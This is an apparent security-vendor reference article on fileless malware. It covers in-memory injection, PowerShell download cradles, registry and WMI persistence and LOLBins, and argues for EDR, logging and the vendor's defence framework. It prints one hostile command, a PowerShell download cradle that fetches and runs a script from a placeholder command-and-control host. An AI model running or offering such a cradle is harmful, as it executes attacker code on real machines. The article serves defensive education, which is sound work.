Fileless Malware
Fileless malware is malicious code that executes entirely in memory without writing a payload file to the target's disk.
Last updated Apr 11, 2026
Continue your mission
Fileless malware is malicious code that executes entirely in memory without writing a payload file to the target's disk.
# Fileless Malware
Fileless malware is malicious code that executes entirely in memory without writing a payload file to the target's disk. Traditional antivirus operates on a simple model: scan files on the file system and compare them against known malicious signatures. Fileless malware breaks this model at its foundation. There is no file to scan. The malicious logic exists as code injected into a running process, as an encoded value stored in the Windows registry, as a WMI event subscription buried in a system database, or as a script executed by a trusted interpreter. The file system is untouched.
The term "fileless" is somewhat imprecise and is better understood as a spectrum. At one end is fully memory-resident malware that never touches the disk in any form. At the other end are attacks that use legitimate files (already on the system) as execution vehicles for malicious logic received from the network. What unites the spectrum is the absence of a dropped executable: no foreign binary file, no unique hash, no quarantine target.
Fileless techniques are not new. They have been present in sophisticated attack toolkits since at least 2014. What has changed is their prevalence. Nation-state actors and ransomware operators now treat fileless execution as a standard operational requirement. According to CrowdStrike threat intelligence, the majority of successful intrusions by tracked adversary groups involve some fileless component. The technique has migrated from elite APT operations to commodity ransomware affiliates because the tools that enable it (Cobalt Strike, PowerShell Empire, Metasploit's Meterpreter) are widely available.
The defensive implication is critical: if an organization's endpoint security relies primarily on antivirus with file scanning, fileless malware operates without meaningful constraint. Detection requires a fundamentally different set of tools and a fundamentally different detection philosophy.
The most technically sophisticated fileless technique is direct injection of code into a legitimate running process. The malicious code executes inside a trusted process and is never written to disk.
Reflective DLL injection is the technique underlying Cobalt Strike Beacon, the most widely deployed post-exploitation framework in use today. A DLL (Dynamic Link Library) file is the normal Windows mechanism for loading shared code into process memory. Standard DLL loading requires the file to exist on disk. Reflective DLL injection bypasses this requirement: the DLL contains its own loader function that maps the DLL into memory without involving the Windows loader and without requiring a file write. The DLL is received as shellcode from a network source or constructed in memory, and it loads itself. The result is a fully functional DLL executing inside a legitimate process (explorer.exe, svchost.exe, notepad.exe) with no corresponding file on disk.
Cobalt Strike's Beacon payload uses reflective DLL injection as its default execution mechanism. When a Cobalt Strike Beacon is deployed against a target, the payload is received over the network, loaded into memory via reflective injection, and begins communicating with the attacker's command-and-control infrastructure, all without touching the file system. This is why Cobalt Strike detections require behavioral analysis rather than file scanning.
Shellcode injection follows a similar pattern without the DLL structure. Raw machine code is written into a memory region of a target process and executed. The VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread Windows API sequence is the classic injection chain: allocate memory in the target process, write shellcode into that memory, and create a thread to execute it. Metasploit's Meterpreter uses this approach. The resulting payload executes inside the target process with that process's privileges and identity, while generating no file system artifacts.
Process hollowing takes an additional step: a legitimate process is started in a suspended state, its memory is replaced with malicious code, and execution resumes. From the operating system's perspective and from the user's perspective, the process appears legitimate. From the attacker's perspective, the malicious code now runs inside a process that has legitimate credentials, legitimate network connections, and a legitimate name in the process list.
Scripts are not executables. They are text, interpreted at runtime by legitimate scripting engines that ship with Windows. PowerShell, VBScript, and JScript all interpret and execute code without requiring a compiled binary.
The canonical fileless PowerShell pattern is the download cradle: IEX(New-Object Net.WebClient).DownloadString('http://[C2]/payload.ps1'). This command fetches a script from an attacker-controlled server and executes it directly in memory using Invoke-Expression (IEX). The script is downloaded into a string variable, never serialized to disk, and executed immediately. Sophisticated variants add obfuscation: variable substitution, character replacement, compression, and encoding to complicate static analysis of the command line.
PowerShell Empire, an open-source post-exploitation framework, operates almost entirely through PowerShell without writing files. Empire agents are PowerShell scripts that execute in memory and communicate with the Empire server over HTTP or HTTPS. The agent persists through registry Run keys or scheduled tasks that execute a PowerShell download cradle at system startup, but the agent itself never writes to disk.
The Windows registry is a configuration database. It is not generally considered a code execution location. Attackers have exploited this assumption by storing malicious code in registry values.
The pattern is: encode a PowerShell script or shellcode as Base64 and store it in a registry value. Then create a persistence mechanism (a scheduled task or Run key) that reads the registry value and executes it using a LOLBin. At startup or login, the system reads the registry value, decodes it, and executes the payload. No executable file is involved in the persistence or execution chain.
This approach stores the payload in the WMI repository or registry, which are database files rather than executable files. Antivirus file scanning does not analyze registry values for malicious code. The payload persists across reboots and survives file system scans with no detection.
WMI event subscriptions are the most persistent and most difficult to detect fileless persistence mechanism. WMI subscriptions consist of three components stored in the WMI repository (a database file at C:\Windows\System32\wbem\Repository):
Once these three components are created, the WMI subscription is active and persists across reboots. The subscription is stored in the WMI repository database, not as a standalone executable. Standard file system scans do not examine the WMI repository for malicious subscriptions. The attacker can create a WMI subscription that executes a PowerShell download cradle at every system startup, establishing persistent command-and-control without any file-based artifact.
APT groups including APT29 (Cozy Bear) and FIN7 have used WMI subscriptions as persistence mechanisms in high-priority intrusions precisely because of this detection difficulty.
Living-off-the-land binaries (LOLBins) serve as the execution layer for fileless payloads received from the network. rundll32, mshta, regsvr32, and similar tools receive malicious code from URLs and execute it without writing the payload to disk. The tool reads the content from the network, passes it to the appropriate interpreter, and executes it in memory.
This completes the fileless chain: the payload lives on the attacker's server. The LOLBin fetches and executes it. The execution happens in memory. Nothing foreign ever touches the disk. (See: Living Off the Land Techniques for detailed LOLBin analysis.)
Cobalt Strike Beacon is the most widely observed post-exploitation tool in confirmed intrusions. It is used by nation-state actors (APT10, APT41, APT29), ransomware groups (LockBit, BlackCat, Cl0p affiliates), and criminal threat actors. Its default deployment is fully fileless through reflective DLL injection.
Astaroth (also known as Guildma) is a Brazilian banking trojan notable for its fully fileless delivery chain. Astaroth arrives via email with a malicious link. The download chain uses BITSAdmin, wmic, certutil, and regsvr32 to download, decode, and inject the final payload entirely through LOLBins and in-memory execution. No malware binary ever touches the disk. Every step uses built-in Windows tools.
Sorebrect is a ransomware family that injects its encryption routine into a legitimate system process (svchost.exe) rather than running as a standalone executable. The ransomware binary triggers the injection, then deletes itself. The encryption operation occurs entirely within the injected code. By the time defenders are alerted to file encryption, the binary that triggered the attack no longer exists.
PowerShell Empire agents operate as entirely in-memory PowerShell processes with no file-based component beyond the initial persistence stager, which itself is often a registry Run key containing a download cradle.
The business case for fileless malware is simple: it defeats the most universally deployed endpoint control without requiring any special capability. Antivirus market penetration is near-universal. Every Windows enterprise environment has antivirus. And antivirus, in its traditional form, provides no meaningful detection capability against fileless attack chains.
This does not mean antivirus has no value. It eliminates commodity threats that use naive file-based delivery. But for any attacker willing to invest in fileless techniques (and Cobalt Strike's widespread availability has made this investment trivial), antivirus is not a meaningful obstacle.
The implication for security program investment is significant. Organizations that rely on antivirus as their primary endpoint control and do not have EDR with behavioral detection and memory inspection are operating with a detection gap against the majority of sophisticated intrusions.
Fileless malware makes EDR (Endpoint Detection and Response) the mandatory endpoint control for organizations that face capable adversaries. This is not a vendor claim. It is a logical consequence of the attack mechanics.
EDR platforms with behavioral detection and memory inspection can detect fileless attacks in ways antivirus cannot:
Organizations without EDR have no reliable mechanism to detect fileless attacks in progress. Organizations with EDR but without behavioral rules tuned for fileless patterns have coverage gaps that a competent attacker can exploit.
Fileless attacks extend dwell time. If the attack produces no file artifacts and no signature detections, the alert that would prompt investigation never fires. The attacker operates for days, weeks, or months within the network. Mandiant M-Trends data shows that organizations without behavioral detection capabilities have significantly longer dwell times than those with mature behavioral detection.
Extended dwell time means extended opportunity for data exfiltration, lateral movement, and escalation. A fileless attacker with extended dwell time can exfiltrate far more data, compromise far more systems, and establish far more persistence mechanisms than an attacker detected and evicted quickly.
CDA is explicit about the domain structure for fileless defense: both SPH (Security Posture and Hygiene) and TID (Threat Intelligence and Defense) are required. Neither alone is sufficient.
SPH, the terrain layer, provides the configuration baseline that makes fileless attacks visible. CDA's Autonomous Posture Command (APC) methodology treats the following as hardening requirements, not optional configurations:
Without these controls, SPH-B02 (endpoint hardening and logging) is incomplete, and the log sources that TID depends on do not exist.
TID, the atmosphere layer, provides the detection capability that interprets these logs and generates alerts. CDA's Predictive Defense Intelligence (PDI) methodology drives the detection rule library. For fileless malware, the relevant detection logic includes:
Mission TID-B01 (SIEM deployment with detection rule library) includes fileless-specific detection rules as a deployment requirement. Mission TID-H01 (detection rule tuning) addresses the false positive reduction required in PowerShell Script Block Logging environments, where legitimate administrative activity generates significant volume.
CDA's mission dependency model is explicit about the SPH-to-TID relationship. SPH-B02 enables TID-B01. Script Block Logging (SPH) enables PowerShell behavioral detection (TID). Sysmon deployment (SPH) enables process injection detection (TID). WMI activity logging (SPH) enables WMI subscription detection (TID).
An organization that deploys TID-B01 detection rules without completing SPH-B02 endpoint hardening will have detection rules that query log sources that do not produce data. The rules will never fire because the events they look for are never generated. This is not a TID failure. It is an SPH failure that manifests as a TID gap.
Mission TID-H01 (detection tuning) and TID-D01 (threat hunting) both presuppose that SPH-B02 is complete. Threat hunting for fileless malware using the hypothesis "search for PowerShell with encoded commands" requires that Script Block Logging is enabled and sending to the SIEM. Without it, the hunt produces no results regardless of whether fileless malware is present.
The Shield assessment scores SPH and TID segment coverage for endpoint logging and behavioral detection. Organizations with red or amber SPH segments in the endpoint hardening area cannot achieve green TID segments in behavioral detection. The segments are causally linked. The visualization makes this dependency legible to executive leadership in a way that a 90-page assessment report does not.
In PDM terms, fileless malware is executed by Beasts (malware) that use fileless techniques to traverse the terrain (SPH) invisibly. The Beasts are not roaming visibly through the terrain. They are living inside legitimate terrain structures, indistinguishable from the environment. Standard terrain patrol (antivirus scanning) cannot find them. Only behavioral sensors (EDR, SIEM with behavioral rules) can detect their presence by observing anomalous activity patterns rather than anomalous file system artifacts.
Nation-state Aliens (APT groups) use fileless techniques delivered through Beasts (Cobalt Strike, Meterpreter) controlled from beyond the atmosphere. The atmosphere (TID) must detect the behavioral indicators because the terrain (SPH) cannot detect the file-based artifacts (there are none). This is why CDA treats EDR as a TID-feeding terrain sensor rather than a standalone antivirus replacement.
MITRE ATT&CK. "Fileless Storage (T1027.011), Process Injection (T1055), Event Triggered Execution: Windows Management Instrumentation Event Subscription (T1546.003)." MITRE Corporation, 2024. https://attack.mitre.org/
CrowdStrike. "2024 Global Threat Report." CrowdStrike, 2024. https://www.crowdstrike.com/global-threat-report/
Microsoft. "Sysmon v15 Configuration Reference." Microsoft Sysinternals, 2024. https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
Microsoft. "Antimalware Scan Interface (AMSI) Documentation." Microsoft, 2024. https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal
CDA, LLC. "Autonomous Posture Command (APC) Methodology Reference." CDA Canon, 2026.
CDA Theater missions that address topics covered in this article.
Written by Evan Morgan
Found an issue? Help improve this article.